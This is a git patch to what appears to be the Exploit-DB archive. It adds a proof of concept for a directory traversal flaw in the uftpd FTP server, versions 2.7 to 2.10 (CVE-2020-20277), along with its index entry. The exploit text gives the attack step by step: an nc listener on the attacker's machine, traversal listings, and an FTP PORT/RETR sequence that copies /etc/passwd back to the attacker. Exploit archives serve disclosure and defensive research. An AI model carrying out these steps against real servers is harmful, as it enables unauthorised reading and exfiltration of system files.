From 636f9a743d1e0ee74b53c1fd18361fab0631d565 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 3 Aug 2022 05:01:51 +0000
Subject: [PATCH] DB: 2022-08-03

1 changes to exploits/shellcodes

uftpd 2.10 - Directory Traversal (Authenticated)
---
 exploits/linux/remote/51000.txt | 27 +++++++++++++++++++++++++++
 files_exploits.csv              |  1 +
 2 files changed, 28 insertions(+)
 create mode 100644 exploits/linux/remote/51000.txt

diff --git a/exploits/linux/remote/51000.txt b/exploits/linux/remote/51000.txt
new file mode 100644
index 000000000..444858e29
--- /dev/null
+++ b/exploits/linux/remote/51000.txt
@@ -0,0 +1,27 @@
+# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
+# Google Dork: N/A
+# Exploit Author: Aaron Esau (arinerron)
+# Vendor Homepage: https://github.com/troglobit/uftpd
+# Software Link: https://github.com/troglobit/uftpd
+# Version: 2.7 to 2.10
+# Tested on: Linux
+# CVE : CVE-2020-20277
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
+# Reference: https://arinerron.com/blog/posts/6
+#Product: uftpd 2.7 to 2.10
+
+#Proof-Of-Concept:
+1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
+
+#Steps
+1-Setup nc listener on attacking machine on TCP port 1258
+nc -lnvp 1258
+
+2-Login to the FTP service
+
+3-List files
+ftp> ls ../../../
+
+3-Set attacker's IP address and retrieve files
+PORT 127,0,0,1,1,1002
+RETR ../../../etc/passwd
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7a2bebe50..c390338f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18720,6 +18720,7 @@ id,file,description,date,author,type,platform,port
 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",1970-01-01,LiquidWorm,remote,hardware,
 50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
+51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,